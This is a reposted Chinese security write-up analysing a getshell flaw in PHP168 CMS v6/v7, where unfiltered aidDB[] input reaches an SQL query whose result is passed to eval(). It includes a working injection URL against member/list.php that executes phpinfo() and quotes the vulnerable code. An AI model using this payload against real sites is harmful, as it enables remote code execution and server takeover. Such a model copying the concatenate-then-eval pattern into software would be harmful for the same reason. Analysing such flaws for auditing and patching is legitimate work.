当前位置: 首页
网络安全
PHP168 V6与V7版本鸡肋获取服务器Shell安全漏洞技术分析

PHP168 V6与V7版本鸡肋获取服务器Shell安全漏洞技术分析

时间:2026-07-27
转载

PHP168v6 v7存在SQL注入结合eval的Getshell漏洞。需网站开启真静态并允许会员注册两个条件,攻击者通过构造恶意aidDB参数,在member list php中触发未过滤的SQL拼接,查询结果中的bencandy_html字段被直接eval执行,可导致任意代码执行。

最近在一次安全审计中发现一处SQL注入漏洞,与之前公开的某个漏洞属于同一类型,但利用条件更为严格——需要满足两个前提:网站需开启文章生成真静态功能,且允许用户注册成为会员。

以下为针对v6版本的漏洞验证代码,直接提交后将执行phpinfo()函数。v7版本原理完全相同,仅数据库字段数量有所差异:

member/list.php?step=2&Type=delete&aidDB[]=-1)%20union%20select%201,2,3,4,5,6,7,8,9,10,1,2,3,4,15,6,7,8,9,10,1,2,3,4,25,6,7,8,9,10,1,2,3,4,35,6,7,8,9,10,1,2,3,4,45,6,7,8,9,10,1,2,3,4,0x7B247B706870696E666F28297D7D,6,7%23

0x01 漏洞关键点:make_more_article_html 函数

该漏洞的核心问题出现在此函数中,关键代码如下:

function make_more_article_html($comebackurl='/',$type='',$aidDB=''){
    global $db,$pre,$webdb,$webdb,$showHtml_Type;
    if($webdb[NewsMakeHtml]!=1||$aidDB=='')  // $webdb[NewsMakeHtml] 必须为真静态
    { return ;}
    ...
    $query = $db->query("SELECT A.*,B.bencandy_html,B.list_html,D.aid FROM {$pre}article_db D LEFT JOIN {$pre}article A ON D.aid=A.aid LEFT JOIN {$pre}sort B ON A.fid=B.fid WHERE D.aid IN ($string)");
    while($rs = $db->fetch_array($query)){
        ...
        $filename_b=$rs[bencandy_html];
        ...
        eval("\$showurl=\"$filename_b\";");
        ...
    }

漏洞的核心在于:$string$aidDB 直接拼接至SQL查询语句,而 $aidDB 参数未经过任何安全过滤。更为严重的是,查询结果中的 bencandy_html 字段值随后被直接传入 eval() 执行——只要攻击者能在 $aidDB 中注入恶意数据,即可控制查询结果,进而通过 eval 执行任意PHP代码,实现远程代码执行。

0x02 触发入口:member/list.php

\member\list.php 文件中,当 step==2Type=='delete' 时,该危险函数被直接调用:

if($step==2){
    ...
    if($Type=='delete'){
        make_more_article_html("$FROMURL","del_0",$aidDB);
    }
}

换言之,攻击者只需构造一个包含恶意 aidDB[] 参数的请求,同时网站满足真静态和允许注册两个条件,即可触发SQL注入。尽管利用门槛相对较高,但一旦成功获取webshell,将对网站造成毁灭性打击。

游乐网为非赢利性网站,所展示的游戏/软件/文章内容均来自于互联网或第三方用户上传分享,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系youleyoucom@outlook.com。

同类文章
更多
DDoS攻击的三大主要形式:原理、特征与防御重点

DDoS攻击的三大主要形式:原理、特征与防御重点

DDoS攻击主要分为基于流量(Volume)、基于应用层(Application)和基于协议(Protocol)三种形式。流量型攻击通过海量数据淹没带宽;应用层攻击利用Web漏洞耗尽服务器资源;协议层攻击则利用TCP握手缺陷导致系统挂起。了解这些原理是制定针对性防御策略的基础。

时间:2026-08-31 11:56
如何有效预防和缓解DDoS攻击:5大核心策略详解

如何有效预防和缓解DDoS攻击:5大核心策略详解

面对DDoS攻击,单纯增加带宽已非长久之计。本文详解5大核心防护策略:优化网络硬件配置、建立DNS冗余机制、部署透明缓解技术、引入负载平衡器及专用Anti-DDoS模块。通过合理组合这些技术手段,可有效抵御SYN泛洪、Slowloris等常见攻击,保障业务连续性与网站可用性。

时间:2026-08-31 11:56
DDoS防护四大误区:CDN、防火墙与黑名单的局限性解析

DDoS防护四大误区:CDN、防火墙与黑名单的局限性解析

许多企业误以为CDN、防火墙或黑名单能完全抵御DDoS攻击。本文深入解析四大常见误区:CDN仅提供部分缓解、静态黑名单易失效、防火墙算力有限且可能成为目标、阈值警报仅具滞后性。了解这些局限性,有助于构建更立体的防御体系,避免在攻击发生时措手不及。

时间:2026-08-31 11:55
常见DDoS攻击类型详解:原理、特征与防御策略

常见DDoS攻击类型详解:原理、特征与防御策略

本文详细解析四种常见DDoS攻击类型:SYN Flood利用TCP三次握手缺陷耗尽资源;UDP Flood通过海量数据包造成带宽拥塞;ICMP Flood利用Ping请求消耗系统算力;应用层Flood针对Web脚本进行高频请求。了解其原理是制定有效防御策略的基础。

时间:2026-08-31 11:55
如何有效抵御DDOS攻击:4种核心防护方案解析

如何有效抵御DDOS攻击:4种核心防护方案解析

面对DDOS攻击,企业需构建多层防护体系。本文详解四大核心策略:利用反向路由器查询进行流量清洗,通过GCDN智能分配节点隐藏源站IP,部署负载均衡硬件分担压力,以及接入高防机房抵御数百G恶意流量。掌握这些技术,可最大程度保障业务连续性。

时间:2026-08-31 11:54
热门专题
更多
刀塔传奇破解版无限钻石下载大全 刀塔传奇破解版无限钻石下载大全
洛克王国正式正版手游下载安装大全 洛克王国正式正版手游下载安装大全
思美人手游下载专区 思美人手游下载专区
好玩的阿拉德之怒游戏下载合集 好玩的阿拉德之怒游戏下载合集
不思议迷宫手游下载合集 不思议迷宫手游下载合集
百宝袋汉化组游戏最新合集 百宝袋汉化组游戏最新合集
jsk游戏合集30款游戏大全 jsk游戏合集30款游戏大全
宾果消消消原版下载大全 宾果消消消原版下载大全